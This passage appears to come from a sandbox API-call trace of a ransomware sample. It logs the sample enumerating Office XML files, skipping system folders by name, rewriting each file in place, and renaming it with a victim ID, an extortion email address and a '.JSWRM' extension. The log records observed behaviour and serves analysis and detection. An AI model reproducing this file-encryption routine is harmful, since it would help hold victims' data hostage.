[0138.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0138.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0138.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0138.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0138.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0138.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0138.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0138.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0138.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0138.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0138.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0138.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0138.907] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL105.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl105.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL105.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl105.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0138.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0138.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0138.909] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d3659fb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d3659fb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d3659fb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9ae4, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL106.XML", cAlternateFileName="")) returned 1 [0138.909] lstrcmpiW (lpString1="PGLBL106.XML", lpString2=".") returned 1 [0138.909] lstrcmpiW (lpString1="PGLBL106.XML", lpString2="..") returned 1 [0138.909] lstrcmpiW (lpString1="PGLBL106.XML", lpString2="...") returned 1 [0138.909] lstrcmpiW (lpString1="PGLBL106.XML", lpString2="windows") returned -1 [0138.909] lstrcmpiW (lpString1="PGLBL106.XML", lpString2="recovery") returned -1 [0138.909] lstrcmpiW (lpString1="PGLBL106.XML", lpString2="perflogs") returned 1 [0138.909] lstrcmpiW (lpString1="PGLBL106.XML", lpString2="documents and settings") returned 1 [0138.909] lstrcmpiW (lpString1="PGLBL106.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.909] lstrcmpiW (lpString1="PGLBL106.XML", lpString2="system volume information") returned -1 [0138.909] lstrcmpiW (lpString1="PGLBL106.XML", lpString2="msocache") returned 1 [0138.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0138.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL106.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL106.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL106.XML", lpUsedDefaultChar=0x0) returned 12 [0138.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0138.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0138.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL106.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL106.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL106.XML", lpUsedDefaultChar=0x0) returned 12 [0138.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0138.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0138.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0138.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0138.910] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL106.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl106.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.911] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=39652) returned 1 [0138.911] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9ae0) returned 0x27b348 [0138.911] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x9ae0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x9ae0, lpOverlapped=0x0) returned 1 [0138.915] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.915] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x9ae0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x9ae0, lpOverlapped=0x0) returned 1 [0138.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0138.915] CloseHandle (hObject=0x238) returned 1 [0138.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0138.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0138.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0138.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0138.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0138.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0138.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0138.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0138.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0138.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0138.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0138.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0138.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0138.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0138.916] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL106.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl106.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL106.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl106.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0138.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0138.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0138.966] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d3659fb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d3659fb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d3659fb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d5c6, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL107.XML", cAlternateFileName="")) returned 1 [0138.966] lstrcmpiW (lpString1="PGLBL107.XML", lpString2=".") returned 1 [0138.966] lstrcmpiW (lpString1="PGLBL107.XML", lpString2="..") returned 1 [0138.966] lstrcmpiW (lpString1="PGLBL107.XML", lpString2="...") returned 1 [0138.966] lstrcmpiW (lpString1="PGLBL107.XML", lpString2="windows") returned -1 [0138.966] lstrcmpiW (lpString1="PGLBL107.XML", lpString2="recovery") returned -1 [0138.966] lstrcmpiW (lpString1="PGLBL107.XML", lpString2="perflogs") returned 1 [0138.966] lstrcmpiW (lpString1="PGLBL107.XML", lpString2="documents and settings") returned 1 [0138.966] lstrcmpiW (lpString1="PGLBL107.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.966] lstrcmpiW (lpString1="PGLBL107.XML", lpString2="system volume information") returned -1 [0138.967] lstrcmpiW (lpString1="PGLBL107.XML", lpString2="msocache") returned 1 [0138.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0138.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL107.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL107.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL107.XML", lpUsedDefaultChar=0x0) returned 12 [0138.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0138.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0138.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL107.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL107.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL107.XML", lpUsedDefaultChar=0x0) returned 12 [0138.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0138.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0138.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0138.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0138.967] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL107.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl107.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.968] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=120262) returned 1 [0138.968] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1d5c0) returned 0x2501e8 [0138.968] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1d5c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x1d5c0, lpOverlapped=0x0) returned 1 [0138.977] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.977] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1d5c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x1d5c0, lpOverlapped=0x0) returned 1 [0138.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0138.977] CloseHandle (hObject=0x238) returned 1 [0138.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0138.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0138.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0138.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0138.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0138.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0138.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0138.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0138.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0138.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0138.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0138.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0138.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0138.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0138.978] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL107.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl107.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL107.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl107.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0138.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0138.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0138.982] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d5a1d84, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d5a1d84, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d5a1d84, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2dbec, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL108.XML", cAlternateFileName="")) returned 1 [0138.982] lstrcmpiW (lpString1="PGLBL108.XML", lpString2=".") returned 1 [0138.983] lstrcmpiW (lpString1="PGLBL108.XML", lpString2="..") returned 1 [0138.983] lstrcmpiW (lpString1="PGLBL108.XML", lpString2="...") returned 1 [0138.983] lstrcmpiW (lpString1="PGLBL108.XML", lpString2="windows") returned -1 [0138.983] lstrcmpiW (lpString1="PGLBL108.XML", lpString2="recovery") returned -1 [0138.983] lstrcmpiW (lpString1="PGLBL108.XML", lpString2="perflogs") returned 1 [0138.983] lstrcmpiW (lpString1="PGLBL108.XML", lpString2="documents and settings") returned 1 [0138.983] lstrcmpiW (lpString1="PGLBL108.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.983] lstrcmpiW (lpString1="PGLBL108.XML", lpString2="system volume information") returned -1 [0138.983] lstrcmpiW (lpString1="PGLBL108.XML", lpString2="msocache") returned 1 [0138.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0138.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL108.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL108.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL108.XML", lpUsedDefaultChar=0x0) returned 12 [0138.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0138.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0138.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL108.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL108.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL108.XML", lpUsedDefaultChar=0x0) returned 12 [0138.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0138.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0138.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0138.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0138.983] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL108.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl108.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.985] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=187372) returned 1 [0138.985] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0138.985] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0138.997] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.997] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0138.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0138.997] CloseHandle (hObject=0x238) returned 1 [0138.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0138.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0138.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0138.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0138.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0138.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0138.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0138.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0138.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0138.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0138.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0138.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0138.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0138.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0138.998] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL108.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl108.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL108.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl108.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: 